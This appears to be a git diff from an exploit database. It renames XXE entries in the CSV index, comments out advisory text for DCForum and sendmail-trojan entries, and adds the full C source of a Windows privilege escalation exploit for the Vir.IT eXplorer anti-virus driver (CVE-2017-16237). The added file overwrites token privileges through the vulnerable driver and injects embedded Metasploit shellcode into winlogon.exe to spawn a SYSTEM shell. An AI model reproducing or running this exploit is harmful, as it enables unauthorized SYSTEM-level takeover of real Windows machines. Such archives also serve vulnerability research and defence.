 37108,platforms/php/webapps/37108.txt,"WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
 37109,platforms/php/webapps/37109.txt,"WordPress Plugin GigPress 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80
-37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080
+37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",java,webapps,8080
 37111,platforms/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80
 37112,platforms/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80
 37113,platforms/php/webapps/37113.txt,"WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
@ -36386,7 +36387,7 @@ id,file,description,date,author,platform,type,port
 37754,platforms/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37948,platforms/php/webapps/37948.txt,"WordPress Plugin Slideshow - Cross-Site Scripting Multiple Vulnerabilities",2012-10-17,waraxe,php,webapps,0
 37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php?path' Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0
-37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
+37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",multiple,webapps,0
 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0
 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
 37767,platforms/multiple/webapps/37767.txt,"Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
@ -36495,7 +36496,7 @@ id,file,description,date,author,platform,type,port
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
 38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Cross-Site Scripting Multiple Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
-38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
+38007,platforms/php/webapps/38007.txt,"DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
 38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
@ -36560,7 +36561,7 @@ id,file,description,date,author,platform,type,port
 38113,platforms/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0
 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Remote Command Execution Multiple Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0
 38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0
-38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0
+38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",xml,webapps,0
 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0
 38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,php,webapps,0
 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
@ -37362,7 +37363,7 @@ id,file,description,date,author,platform,type,port
 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
 39848,platforms/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
-39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80
+39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
 39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80
 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
@ -37432,7 +37433,7 @@ id,file,description,date,author,platform,type,port
 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80
 39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80
 39989,platforms/php/webapps/39989.txt,"Joomla! Component com_publisher - SQL Injection",2016-06-21,s0nk3y,php,webapps,80
-39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE",2016-06-21,ERPScan,java,webapps,0
+39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity",2016-06-21,ERPScan,java,webapps,0
 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Persistent Cross-Site Scripting Multiple Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
@ -37471,7 +37472,7 @@ id,file,description,date,author,platform,type,port
 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
 40070,platforms/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",php,webapps,80
 40076,platforms/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
-40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
+40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - Unauthenticated XML External Entity Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Cross-Site Request Forgery Multiple Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
--- a/platforms/cgi/remote/20849.pl
+++ b/platforms/cgi/remote/20849.pl
@ -1,16 +1,17 @@
-source: http://www.securityfocus.com/bid/2728/info
+#source: http://www.securityfocus.com/bid/2728/info
-
+#
-DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
+#DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
-
+#
-Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.
+#Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.
-
+#
-DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.
+#DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.
-
+#
-When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.
+#When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.
-
+#
-DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.
+#DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.
-
+#
-This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 
+#This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 
 #
 #!/usr/bin/perl
--- a/platforms/unix/remote/21919.sh
+++ b/platforms/unix/remote/21919.sh
@ -1,26 +1,26 @@
-source: http://www.securityfocus.com/bid/5921/info
+#source: http://www.securityfocus.com/bid/5921/info
-
+#
-Reportedly, the server hosting sendmail, ftp.sendmail.org, was compromised recently. It has been reported that the intruder made modifications to the source code of sendmail to include Trojan Horse code. Downloads of the sendmail source code from ftp.sendmail.org between September 28, 2002 and October 6, 2002 likely contain the trojan code.
+#Reportedly, the server hosting sendmail, ftp.sendmail.org, was compromised recently. It has been reported that the intruder made modifications to the source code of sendmail to include Trojan Horse code. Downloads of the sendmail source code from ftp.sendmail.org between September 28, 2002 and October 6, 2002 likely contain the trojan code.
-
+#
-It has also been reported that versions of sendmail available via HTTP distribution on the Sendmail Consortium site are not affected.
+#It has also been reported that versions of sendmail available via HTTP distribution on the Sendmail Consortium site are not affected.
-
+#
-Reports say that the trojan will run once upon compilation of sendmail. Once the Trojan is executed, it attempts to connect to host spatula.aclue.com (66.37.138.99) on port 6667.
+#Reports say that the trojan will run once upon compilation of sendmail. Once the Trojan is executed, it attempts to connect to host spatula.aclue.com (66.37.138.99) on port 6667.
-
+#
-Although unconfirmed, it has been reported that the service listening on port 6667 of host spatula.aclue.com (66.37.138.99) has been disabled.
+#Although unconfirmed, it has been reported that the service listening on port 6667 of host spatula.aclue.com (66.37.138.99) has been disabled.
-
+#
-The Sendmail Consortium has signed all valid distributions of the sendmail software with the following PGP key:
+#The Sendmail Consortium has signed all valid distributions of the sendmail software with the following PGP key:
-
+#
-pub 1024R/678C0A03 2001-12-18 Sendmail Signing Key/2002 <sendmail@Sendmail.ORG>
+#pub 1024R/678C0A03 2001-12-18 Sendmail Signing Key/2002 <sendmail@Sendmail.ORG>
-Key fingerprint = 7B 02 F4 AA FC C0 22 DA 47 3E 2A 9A 9B 35 22 45 
+#Key fingerprint = 7B 02 F4 AA FC C0 22 DA 47 3E 2A 9A 9B 35 22 45 
-
+#
-Additionally, the following checksums have been made available to verify packages against:
+#Additionally, the following checksums have been made available to verify packages against:
-
+#
-73e18ea78b2386b774963c8472cbd309 sendmail.8.12.6.tar.gz
+#73e18ea78b2386b774963c8472cbd309 sendmail.8.12.6.tar.gz
-cebe3fa43731b315908f44889d9d2137 sendmail.8.12.6.tar.Z
+#cebe3fa43731b315908f44889d9d2137 sendmail.8.12.6.tar.Z
-8b9c78122044f4e4744fc447eeafef34 sendmail.8.12.6.tar.sig
+#8b9c78122044f4e4744fc447eeafef34 sendmail.8.12.6.tar.sig
-
+#
-
+#
-/* Forrest Rae offered this decoded portion to us  fbr@14x.net */
+#/* Forrest Rae offered this decoded portion to us  fbr@14x.net */
 #!/bin/sh
--- a/platforms/unix/remote/22084.c
+++ b/platforms/unix/remote/22084.c
@ -1,8 +1,10 @@
 /*
 source: http://www.securityfocus.com/bid/6373/info
 A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users. 
 The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.
 */
 /***********************************************************
 * hoagie_mysql.c
--- a/platforms/windows/local/43109.c
+++ b/platforms/windows/local/43109.c
@ -0,0 +1,273 @@
 /*
 Exploit Title    - Vir.IT eXplorer Anti-Virus Arbitrary Write Privilege Escalation
 Date             - 1st November 2017
 Discovered by    - Parvez Anwar (@parvezghh)
 Vendor Homepage  - http://www.tgsoft.it
 Tested Version   - 8.5.39
 Driver Version   - 1.0.0.11 - VIAGLT64.SYS
 Tested on OS     - 64bit Windows 7 and Windows 10 (1709) 
 CVE ID           - CVE-2017-16237
 Vendor fix url   - n/a
 Fixed Version    - 8.5.42
 Fixed driver ver - 1.0.0.12
 Check blogpost for details:
 https://www.greyhathacker.net/?p=990
 */
 #include <stdio.h>
 #include <windows.h>
 #include <TlHelp32.h>
 #pragma comment(lib,"advapi32.lib")
 #define SystemHandleInformation 16
 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
 typedef unsigned __int64 QWORD;
 typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
 {
     ULONG       ProcessId;
     UCHAR       ObjectTypeNumber;
     UCHAR       Flags;
     USHORT      Handle;
     QWORD       Object;
     ACCESS_MASK GrantedAccess;
 } SYSTEM_HANDLE, *PSYSTEM_HANDLE;
 typedef struct _SYSTEM_HANDLE_INFORMATION 
 {
     ULONG NumberOfHandles;
     SYSTEM_HANDLE Handles[1];
 } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
 typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     ULONG SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);
 DWORD getProcessId(char* process)
 {
     HANDLE          hSnapShot;
     PROCESSENTRY32  pe32;
     DWORD           pid;
     hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
     if (hSnapShot == INVALID_HANDLE_VALUE) 
     {
         printf("\n[-] Failed to create handle CreateToolhelp32Snapshot()\n\n");
         return -1;
     } 
     pe32.dwSize = sizeof(PROCESSENTRY32);
     if (Process32First(hSnapShot, &pe32) == FALSE)
     {
         printf("\n[-] Failed to call Process32First()\n\n");
         return -1;
     }
     do
     {
         if (stricmp(pe32.szExeFile, process) == 0)
         {
             pid = pe32.th32ProcessID;
             return pid;
         }
     } while (Process32Next(hSnapShot, &pe32));
     CloseHandle(hSnapShot);
     return 0;
 }
 int spawnShell()
 {
 // windows/x64/exec - 275 bytes http://www.metasploit.com
 // VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, CMD=cmd.exe
     char shellcode[] =
     "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 
     "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 
     "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 
     "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 
     "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 
     "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 
     "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 
     "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 
     "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 
     "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 
     "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 
     "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 
     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 
     "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 
     "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 
     "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" 
     "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" 
     "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" 
     "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" 
     "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
     char*     process = "winlogon.exe";
     DWORD     pid;
     HANDLE    hProcess;
     HANDLE    hThread;
     LPVOID    ptrtomem;
     pid = getProcessId(process);
     if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
     {
         printf("\n[-] Unable to open %s process\n\n", process);
         return -1;
     }
     printf("\n[+] Opened %s process pid=%d with PROCESS_ALL_ACCESS rights", process, pid);
     if ((ptrtomem = VirtualAllocEx(hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
     {
         printf("\n[-] Unable to allocate memory in target process\n\n");
         return -1;
     }
     printf("\n[+] Memory allocated at address 0x%p", ptrtomem);
     if (!(WriteProcessMemory(hProcess, (LPVOID)ptrtomem, shellcode, sizeof(shellcode), NULL)))
     {
         printf("\n[-] Unable to write to process memory\n\n");
         return -1;
     }
     printf("\n[+] Written to allocated process memory");
     if ((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)ptrtomem, NULL, 0, NULL)) == NULL)
     {
         CloseHandle(hThread);
         printf("\n[-] Unable to create remote thread\n\n");
         return -1;
     }
     printf("\n[+] Created remote thread and executed\n\n");   
     return 0;
 }
 QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) 
 {
    _NtQuerySystemInformation   NtQuerySystemInformation;
    PSYSTEM_HANDLE_INFORMATION  pSysHandleInfo; 
    ULONG                       i;
    PSYSTEM_HANDLE              pHandle;
    QWORD                       TokenAddress = 0;       
    DWORD                       nSize = 4096;
    DWORD                       nReturn; 
    BOOL                        tProcess;    
    HANDLE                      hToken;
    if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
    {
        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
        return -1;
    }
    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;  
    }
    do
    {  
        nSize += 4096;
        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); 
    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);	
    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++) 
    {
        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) 
        {
            TokenAddress = pSysHandleInfo->Handles[i].Object;	     			  
        }
    }
    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
    return TokenAddress;	
 }
 int main(int argc, char *argv[]) 
 {
    QWORD      TokenAddressTarget; 
    QWORD      SepPrivilegesOffset = 0x40;
    QWORD      TokenAddress;
    HANDLE     hDevice;
    char       devhandle[MAX_PATH];
    DWORD      dwRetBytes = 0;             
    QWORD      input[3] = {0};     
    printf("-------------------------------------------------------------------------------\n");
    printf("       Vir.IT eXplorer Anti-Virus (VIAGLT64.SYS) Arbitrary Write EoP Exploit   \n");
    printf("                 Tested on 64bit Windows 7 / Windows 10 (1709)                 \n");
    printf("-------------------------------------------------------------------------------\n");
    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
    printf("\n[i] Address of current process token 0x%p", TokenAddress);
    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget);
    input[0] = TokenAddressTarget;
    input[1] = 0x0000000602110000;
    input[2] = 0x0000000000110000;
    sprintf(devhandle, "\\\\.\\%s", "viragtlt");
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	
    printf("\n[~] Press any key to continue . . .\n");
    getch();
    DeviceIoControl(hDevice, 0x8273007C, input, sizeof(input), NULL, 0, &dwRetBytes, NULL); 
    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
    CloseHandle(hDevice);
    printf("[*] Spawning SYSTEM Shell");
    spawnShell();
    return 0;
 }